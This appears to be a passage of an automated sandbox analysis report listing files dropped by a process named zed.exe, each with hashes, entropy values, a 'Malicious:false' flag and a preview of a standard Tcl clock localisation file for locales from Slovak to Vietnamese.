                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sk DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "Ut"\.. "St"\.. "\u0160t"\.. "Pa"\.. "So"].. ::msgcat::mcset sk DAYS_OF_WEEK_FULL [list \.. "Nede\u013ee"\.. "Pondelok"\.. "Utorok"\.. "Streda"\.. "\u0160tvrtok"\.. "Piatok"\.. "Sobota"].. ::msgcat::mcset sk MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sk MONTHS_FULL [list \.. "janu\u00e1r"\.. "febru\u00e1r"\.. "marec"\.. "apr\u00edl"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "august"\.. "september"\.. "okt\u00f3ber"\.. "november"\.. "decem
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1216
                                                                                                                                                                                                                                            Entropy (8bit):4.333705818952628
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83MIXpC9opYuGS/BrIsmZ5hv1yAxyIVjd392WFThENvt0vJoO:43fXYujZrqyApYJtyR
                                                                                                                                                                                                                                            MD5:CB76F54CBE0D1AAE8BA956B4C51CBD2A
                                                                                                                                                                                                                                            SHA1:C1F78375EDB0BD2504553E33B2024C0C63FDB1B2
                                                                                                                                                                                                                                            SHA-256:11A6264676DBED87E4F718075127E32E107854F35F141642454F484984084486
                                                                                                                                                                                                                                            SHA-512:69964348FF08DE6EEB5E3DD61057FF0DF5441105EB7BEE7FB7E9AC5E26DCC164E3C7C011CA5CD7BC5B97A7872532331C97CCBC80563F6C5A3548014BFA8BEF16
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sl DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Tor"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sob"].. ::msgcat::mcset sl DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljek"\.. "Torek"\.. "Sreda"\.. "\u010cetrtek"\.. "Petek"\.. "Sobota"].. ::msgcat::mcset sl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "avg"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sl MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marec"\.. "april"\.. "maj"\.. "junij"\.. "julij"\.. "avgust"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset sl B
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1321
                                                                                                                                                                                                                                            Entropy (8bit):4.408176575111904
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83F7ONQEwXwjjTlVoSEh76W/X+WZQJ4hv+H6v2V:43NwjPEwl4VQ8q
                                                                                                                                                                                                                                            MD5:E606F620F03EC0FBDBE6551601299C5F
                                                                                                                                                                                                                                            SHA1:0B50AB679E8D90D8E7319BCADAC426E004594D3B
                                                                                                                                                                                                                                            SHA-256:1F4EFD78F6B45B65F73F09B2F52FC13C2A7C4138DCB7664804878D197B6EBDF9
                                                                                                                                                                                                                                            SHA-512:08AF2B51EB7111E334ADDA3A03F9A8816C104E9742B523EC363FB5131A3DF73D298A8DDCD573D23C23C65CCFD2B8898DF75AE3D4F04BF80744044FB6BAB5EC0A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sq DAYS_OF_WEEK_ABBREV [list \.. "Die"\.. "H\u00ebn"\.. "Mar"\.. "M\u00ebr"\.. "Enj"\.. "Pre"\.. "Sht"].. ::msgcat::mcset sq DAYS_OF_WEEK_FULL [list \.. "e diel"\.. "e h\u00ebn\u00eb"\.. "e mart\u00eb"\.. "e m\u00ebrkur\u00eb"\.. "e enjte"\.. "e premte"\.. "e shtun\u00eb"].. ::msgcat::mcset sq MONTHS_ABBREV [list \.. "Jan"\.. "Shk"\.. "Mar"\.. "Pri"\.. "Maj"\.. "Qer"\.. "Kor"\.. "Gsh"\.. "Sht"\.. "Tet"\.. "N\u00ebn"\.. "Dhj"\.. ""].. ::msgcat::mcset sq MONTHS_FULL [list \.. "janar"\.. "shkurt"\.. "mars"\.. "prill"\.. "maj"\.. "qershor"\.. "korrik"\.. "gusht"\.. "shtator"\.. "tetor"\.. "n\u00ebntor"\.. "dhjetor"\.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2087
                                                                                                                                                                                                                                            Entropy (8bit):4.307749748884122
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43ilQTSBQrQP9QenzMKSFD9NI/QiNQEQrQL1KKYjU5rtAx:2I5EyLMKSFZNIYMzYMKKiqW
                                                                                                                                                                                                                                            MD5:BF363AB60B57F6D8FDCDBFD230A28DDF
                                                                                                                                                                                                                                            SHA1:6375CBA0A2197DA7E65BEE45C42F02C4F0B9142D
                                                                                                                                                                                                                                            SHA-256:FA00A7B22C9941F6C2B893F22B703DCB159CA2F2E4005FD6A74A632AEB786BFA
                                                                                                                                                                                                                                            SHA-512:91AD8085EF321A5A0E4D2ED204940CB66E8E230BBEDE59A8A07D1CEED9155FCC6B075A1FCC44AE834C1FEEEB3A59256C4310684C5AC453D4C50DFABD88469814
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sr DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0435\u0434"\.. "\u041f\u043e\u043d"\.. "\u0423\u0442\u043e"\.. "\u0421\u0440\u0435"\.. "\u0427\u0435\u0442"\.. "\u041f\u0435\u0442"\.. "\u0421\u0443\u0431"].. ::msgcat::mcset sr DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u0459\u0430"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u0459\u0430\u043a"\.. "\u0423\u0442\u043e\u0440\u0430\u043a"\.. "\u0421\u0440\u0435\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u0440\u0442\u0430\u043a"\.. "\u041f\u0435\u0442\u0430\u043a"\.. "\u0421\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset sr MONTHS_ABBREV [list \.. "\u0408\u0430\u043d"\.. "\u0424\u0435\u0431"\.. "\u041c\u0430\u0440"\.. "\u0410\u043f\u0440"\.. "\u041c\u0430\u0458"\.. "\u0408\u0443\u043d"\.. "\
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1219
                                                                                                                                                                                                                                            Entropy (8bit):4.3542418837714285
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83qoLt6yLQoAusrIsmZ5m4AcjTHX92WFfjr4MvBvX:43ZLxQNusrr4Aw3Jkq1X
                                                                                                                                                                                                                                            MD5:3B5C3FFA0829768470BDA1B46D882060
                                                                                                                                                                                                                                            SHA1:C96799036EC5CCDE799A6B50CD7748908935A2F3
                                                                                                                                                                                                                                            SHA-256:483916B51BD7E071E88F9EC36AAF3E08FEA823991532F832DE491C6C40B55A9F
                                                                                                                                                                                                                                            SHA-512:684FA249123878AA7F856DF0FD3B0D9F041113CFEA8EEFA47D0E1948DA23694330BF0D62BA896A3891CD559C16CAE9330BF31508F530AC003D2929D5FD9246D8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sv DAYS_OF_WEEK_ABBREV [list \.. "s\u00f6"\.. "m\u00e5"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f6"].. ::msgcat::mcset sv DAYS_OF_WEEK_FULL [list \.. "s\u00f6ndag"\.. "m\u00e5ndag"\.. "tisdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f6rdag"].. ::msgcat::mcset sv MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sv MONTHS_FULL [list \.. "januari"\.. "februari"\.. "mars"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "augusti"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat:
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1040
                                                                                                                                                                                                                                            Entropy (8bit):4.108744949579904
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383A4mScvhkzoR4mtuWckRkoay3UVxMmALfG7IdzVJ633xRCPLMYMvYo76u:4aR83/Shkz1uckO76kMmEf62qOTdMvvn
                                                                                                                                                                                                                                            MD5:5774860C8AEECBD48F1502E616158CAB
                                                                                                                                                                                                                                            SHA1:DE7059713EA7913A0C79F5386833CE2BCAD2CFD7
                                                                                                                                                                                                                                            SHA-256:1DA068C9AA02EF14A2440758C6040D632D96044A20EC501DBB9E40D8592E0E7F
                                                                                                                                                                                                                                            SHA-512:91E69222DDF55E9E0E389DB77D7A0F2E082351DC3FB34A1A2C1E350E4187E8BB940F6C2EDE1B8651159C2787AA0BE4D7268F33F7A82CAED03514FCE462530408
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sw DAYS_OF_WEEK_ABBREV [list \.. "Jpi"\.. "Jtt"\.. "Jnn"\.. "Jtn"\.. "Alh"\.. "Iju"\.. "Jmo"].. ::msgcat::mcset sw DAYS_OF_WEEK_FULL [list \.. "Jumapili"\.. "Jumatatu"\.. "Jumanne"\.. "Jumatano"\.. "Alhamisi"\.. "Ijumaa"\.. "Jumamosi"].. ::msgcat::mcset sw MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset sw MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Machi"\.. "Aprili"\.. "Mei"\.. "Juni"\.. "Julai"\.. "Agosti"\.. "Septemba"\.. "Oktoba"\.. "Novemba"\.. "Desemba"\.. ""].. ::msgcat::mcset sw BCE "
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1874
                                                                                                                                                                                                                                            Entropy (8bit):4.080580566597515
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83AI0xnJdnQhmHlHYPKtul+eOPfIxyH5ztUSLu8tptLtrl+eOPfIxyH5ztUSU:43N0dQmHlHYPKtu1HxMtr1Hx/
                                                                                                                                                                                                                                            MD5:85288236C3997302EA26D7403BBA2C15
                                                                                                                                                                                                                                            SHA1:05AB389CC4DCF17B37BFF6ED1ECD58D6E9850A01
                                                                                                                                                                                                                                            SHA-256:AEFDC4255890D5B3FFE5CEE1B457B7D711283C2287ABA644155C10956012F6C1
                                                                                                                                                                                                                                            SHA-512:8E389D46606176EE14B8356153095B49C9426B80139B672A620F488891F091D1A272D4FB116775900E4AB4EC84DDDEBD8D6AF81AC672F14F148F2BFC638D2B10
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta DAYS_OF_WEEK_FULL [list \.. "\u0b9e\u0bbe\u0baf\u0bbf\u0bb1\u0bc1"\.. "\u0ba4\u0bbf\u0b99\u0bcd\u0b95\u0bb3\u0bcd"\.. "\u0b9a\u0bc6\u0bb5\u0bcd\u0bb5\u0bbe\u0baf\u0bcd"\.. "\u0baa\u0bc1\u0ba4\u0ba9\u0bcd"\.. "\u0bb5\u0bbf\u0baf\u0bbe\u0bb4\u0ba9\u0bcd"\.. "\u0bb5\u0bc6\u0bb3\u0bcd\u0bb3\u0bbf"\.. "\u0b9a\u0ba9\u0bbf"].. ::msgcat::mcset ta MONTHS_ABBREV [list \.. "\u0b9c\u0ba9\u0bb5\u0bb0\u0bbf"\.. "\u0baa\u0bc6\u0baa\u0bcd\u0bb0\u0bb5\u0bb0\u0bbf"\.. "\u0bae\u0bbe\u0bb0\u0bcd\u0b9a\u0bcd"\.. "\u0b8f\u0baa\u0bcd\u0bb0\u0bb2\u0bcd"\.. "\u0bae\u0bc7"\.. "\u0b9c\u0bc2\u0ba9\u0bcd"\.. "\u0b9c\u0bc2\u0bb2\u0bc8"\.. "\u0b86\u0b95\u0bb8\u0bcd\u0b9f\u0bcd"\.. "\u0b9a\u0bc6\u0baa\u0bcd\u0b9f\u0bae\u0bcd\u0baa\u0bb0\u0bcd"\.. "\u0b85\u0b95\u0bcd\u0b9f\u0bcb\u0baa\u0bb0\u0bcd"\.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.863003494480733
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xosDv+IZosK3v6ry/5osDo+3v+6f6HyFvn:4EnLB383ZDvl5K3v6ry/ZDF3vmSVn
                                                                                                                                                                                                                                            MD5:CF078352DA0507C767F04E31D6C14296
                                                                                                                                                                                                                                            SHA1:0A9B1255BD85B60D3620AE61370F54748AB7A182
                                                                                                                                                                                                                                            SHA-256:4978A193076DE56944236F7F1DCECACFF739536DFB3DBEFC1F7FE2B97A8AEAF4
                                                                                                                                                                                                                                            SHA-512:6FFC85B2A8DECB373EC76B1CD1A9459A30E443319F2C8DB9BBE6E115F5EFEEBAC314D4E8BE996EA55EE46466C6F6057A73078F5FDCF1C4CBAF1A270E45BC10C0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset ta_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset ta_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2149
                                                                                                                                                                                                                                            Entropy (8bit):4.097884113767283
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43a8mxI9k3JR0UjjFbPcniLHVktjjFbPcniLHVM:2a8v9k3JdbPcIidbPcIG
                                                                                                                                                                                                                                            MD5:61E4CB2AAD66285E9113071057F39C35
                                                                                                                                                                                                                                            SHA1:A2BD21090859669C4B6A875E077825381B7E2702
                                                                                                                                                                                                                                            SHA-256:9E96C7123100234A7018533764502985A208F2EB3314F5B6332D46016725A63F
                                                                                                                                                                                                                                            SHA-512:589A2D65508B07B5FDEDA883F71A4B496B25458CA1ECE7C4D4F5DAE82EB683DA82C8E21E57D63A235AB600174C9D362A746B2E27BAA6E3ADE1B7BD9D6000BE27
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te DAYS_OF_WEEK_ABBREV [list \.. "\u0c06\u0c26\u0c3f"\.. "\u0c38\u0c4b\u0c2e"\.. "\u0c2e\u0c02\u0c17\u0c33"\.. "\u0c2c\u0c41\u0c27"\.. "\u0c17\u0c41\u0c30\u0c41"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30"\.. "\u0c36\u0c28\u0c3f"].. ::msgcat::mcset te DAYS_OF_WEEK_FULL [list \.. "\u0c06\u0c26\u0c3f\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c38\u0c4b\u0c2e\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2e\u0c02\u0c17\u0c33\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2c\u0c41\u0c27\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c17\u0c41\u0c30\u0c41\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c28\u0c3f\u0c35\u0c3e\u0c30\u0c02"].. ::msgcat::mcset te MONTHS_ABBREV [list \.. "\u0c1c\u0c28\u0c35\u0c30\u0c3f"\.. "\u0c2b\u0c3f\u0c2c\u0c4d\u0c30\u0c35\u0c30\u0c3f"\.. "\u0c2e\u0c3
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):419
                                                                                                                                                                                                                                            Entropy (8bit):5.058324650031252
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383LjZWsn0sHjoD0savzda3v6ry/ZF3vMSVn:4aR833Z1nnHjoDnavzd8vSCZNvMSV
                                                                                                                                                                                                                                            MD5:BCA040A356E7E8CC597EFB9B9065F8E1
                                                                                                                                                                                                                                            SHA1:ADAF7EC8C2035BC06E168D3F1BD7F39277E9273F
                                                                                                                                                                                                                                            SHA-256:B110FEEDDA21ECCEFA624BEF8E1476E9F221FB253880AC370967AE4D0237CA7A
                                                                                                                                                                                                                                            SHA-512:D408ECE8CF89FB23B45420D3CBA7655EEE713498210889A84EE25D3417360705546D97028EAAAA47764B6E9B0A3699669B98C0A53861A38E0DFCB9F3B8A47BEC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te_IN AM "\u0c2a\u0c42\u0c30\u0c4d\u0c35\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN PM "\u0c05\u0c2a\u0c30\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset te_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset te_IN DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2359
                                                                                                                                                                                                                                            Entropy (8bit):4.382796122808316
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:439X4QKPQJecQwFA0P9JmDsxQ7KHfWkD2CQM0DnWxFDzCYmdrtVP:29ohCi1028QmHfIC4jW3DmHB
                                                                                                                                                                                                                                            MD5:7F61E1EA256D78948189EF07119663CD
                                                                                                                                                                                                                                            SHA1:6867E9780049FACE9984B7788B6F362B8D1AD718
                                                                                                                                                                                                                                            SHA-256:48BEAF693BF5B6EED15234DB0D375B97E6D576A749E9048420C153E6CAFC0259
                                                                                                                                                                                                                                            SHA-512:F3E24E0B41A7D722AC2FA0E429A2DCB1CCB5BAECC9912ADF6AF79C51366EA1AC9F931F0F44F068F3CEE6873516E6223CC5E7616CF523B1DFB9E528DE4D58454A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset th DAYS_OF_WEEK_ABBREV [list \.. "\u0e2d\u0e32."\.. "\u0e08."\.. "\u0e2d."\.. "\u0e1e."\.. "\u0e1e\u0e24."\.. "\u0e28."\.. "\u0e2a."].. ::msgcat::mcset th DAYS_OF_WEEK_FULL [list \.. "\u0e27\u0e31\u0e19\u0e2d\u0e32\u0e17\u0e34\u0e15\u0e22\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e08\u0e31\u0e19\u0e17\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e2d\u0e31\u0e07\u0e04\u0e32\u0e23"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e38\u0e18"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e24\u0e2b\u0e31\u0e2a\u0e1a\u0e14\u0e35"\.. "\u0e27\u0e31\u0e19\u0e28\u0e38\u0e01\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e40\u0e2a\u0e32\u0e23\u0e4c"].. ::msgcat::mcset th MONTHS_ABBREV [list \.. "\u0e21.\u0e04."\.. "\u0e01.\u0e1e."\.. "\u0e21\u0e35.\u0e04."\.. "\u0e40\u0e21.\u0e22."\.. "\u0e1e.\u0e04."\.. "\u0e21\u0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1183
                                                                                                                                                                                                                                            Entropy (8bit):4.390397293529625
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83ZVUflVdq4qTr6dyX59508THHCh5LbQgWiNv9KvWIn:43PXTtbTngLhWiJGWIn
                                                                                                                                                                                                                                            MD5:017F0F989BD5DBBF25E7C797CE09C45C
                                                                                                                                                                                                                                            SHA1:162922DBD55A31A74410375A36EE7BC50E092BDD
                                                                                                                                                                                                                                            SHA-256:4B85B345D6C43F7257C6849A60A492397FD5FD9D82DF3A2252189D7A1ECCBB64
                                                                                                                                                                                                                                            SHA-512:73B6CF395753D863330687404E8A584CB08B81A8CC456DCE7BB49C4EA15EA19E45E3CC1E1367E10915DE14AC6258383289BCFEF55AD2768A50889DF390D37EF9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset tr DAYS_OF_WEEK_ABBREV [list \.. "Paz"\.. "Pzt"\.. "Sal"\.. "\u00c7ar"\.. "Per"\.. "Cum"\.. "Cmt"].. ::msgcat::mcset tr DAYS_OF_WEEK_FULL [list \.. "Pazar"\.. "Pazartesi"\.. "Sal\u0131"\.. "\u00c7ar\u015famba"\.. "Per\u015fembe"\.. "Cuma"\.. "Cumartesi"].. ::msgcat::mcset tr MONTHS_ABBREV [list \.. "Oca"\.. "\u015eub"\.. "Mar"\.. "Nis"\.. "May"\.. "Haz"\.. "Tem"\.. "A\u011fu"\.. "Eyl"\.. "Eki"\.. "Kas"\.. "Ara"\.. ""].. ::msgcat::mcset tr MONTHS_FULL [list \.. "Ocak"\.. "\u015eubat"\.. "Mart"\.. "Nisan"\.. "May\u0131s"\.. "Haziran"\.. "Temmuz"\.. "A\u011fustos"\.. "Eyl\u00fcl"\.. "Ekim"\.. "Kas\u0131m"\.. "Aral\u
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2165
                                                                                                                                                                                                                                            Entropy (8bit):4.289021158621493
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:436yILgoQjQPxUIkgPDRQnQ0vVQbC1iQwweIgWQDIoZI7QDI3QbI87IVQnIzQ7mh:2AzUe3EhV8CYgrbH7z3fLVTzgn5jyX7p
                                                                                                                                                                                                                                            MD5:323BD95809A44B0BADC71AD36E5F095B
                                                                                                                                                                                                                                            SHA1:44F6016873CA955D27545C56CCD24BDB06A83C43
                                                                                                                                                                                                                                            SHA-256:7093DA7E39CEB6D3F51EB6CF1CCA2D7F3680ED7B8FE4A5F0CECEEF6BEB21AC77
                                                                                                                                                                                                                                            SHA-512:DB16E0E2D17CE47673DE781A7171944C14CC550FB8EB0920C05B979E4D067E36DF0B59B8BFA81F82D8FCE1FFDDAAD2755E68BFE5BC0DBB11E8716A4D18BA5F7E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset uk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0432\u0442"\.. "\u0441\u0440"\.. "\u0447\u0442"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset uk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0456\u043b\u044f"\.. "\u043f\u043e\u043d\u0435\u0434\u0456\u043b\u043e\u043a"\.. "\u0432\u0456\u0432\u0442\u043e\u0440\u043e\u043a"\.. "\u0441\u0435\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440"\.. "\u043f'\u044f\u0442\u043d\u0438\u0446\u044f"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset uk MONTHS_ABBREV [list \.. "\u0441\u0456\u0447"\.. "\u043b\u044e\u0442"\.. "\u0431\u0435\u0440"\.. "\u043a\u0432\u0456\u0442"\.. "\u0442\u0440\u0430\u0432"\.. "\u0447\u0435\u0440\u0432"\.. "\u043b
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1471
                                                                                                                                                                                                                                            Entropy (8bit):4.44729506678271
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR836DNjYTP55YAUy2tJ9kyzW68IFYHMBSW1K1pvhv1O:43dbYJyC8ySgI1dV1O
                                                                                                                                                                                                                                            MD5:C127F54C462917D3B3EEF5F29F612138
                                                                                                                                                                                                                                            SHA1:B1D9A67F856D93F98524C6372B352EA0DE1B9CD3
                                                                                                                                                                                                                                            SHA-256:E9B7AECD456F1D2288604C982B5DED0DCF71DCA968C0B0EAFF4CA16CC3B73EC2
                                                                                                                                                                                                                                            SHA-512:0B0F132F10580751258D37E070338C3B39DF57FDECDB9D0AFA67E90D6766DDCB4D711876E551ED759D177F1B8F4E9E1DD8F7899F7CB57F8039F55EC4C2984E87
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset vi DAYS_OF_WEEK_ABBREV [list \.. "Th 2"\.. "Th 3"\.. "Th 4"\.. "Th 5"\.. "Th 6"\.. "Th 7"\.. "CN"].. ::msgcat::mcset vi DAYS_OF_WEEK_FULL [list \.. "Th\u01b0\u0301 hai"\.. "Th\u01b0\u0301 ba"\.. "Th\u01b0\u0301 t\u01b0"\.. "Th\u01b0\u0301 n\u0103m"\.. "Th\u01b0\u0301 s\u00e1u"\.. "Th\u01b0\u0301 ba\u0309y"\.. "Chu\u0309 nh\u00e2\u0323t"].. ::msgcat::mcset vi MONTHS_ABBREV [list \.. "Thg 1"\.. "Thg 2"\.. "Thg 3"\.. "Thg 4"\.. "Thg 5"\.. "Thg 6"\.. "Thg 7"\.. "Thg 8"\.. "Thg 9"\.. "Thg 10"\.. "Thg 11"\.. "Thg 12"\.. ""].. ::msgcat::mcset vi MONTHS_FULL [list \.. "Th\u00e1ng m\u00f4\u0323t"\.. "Th\u00e1ng hai"\.. "Th\u00e1ng ba"\.. "Th\u00e1ng t\u01b0"\.. "Th\u00e
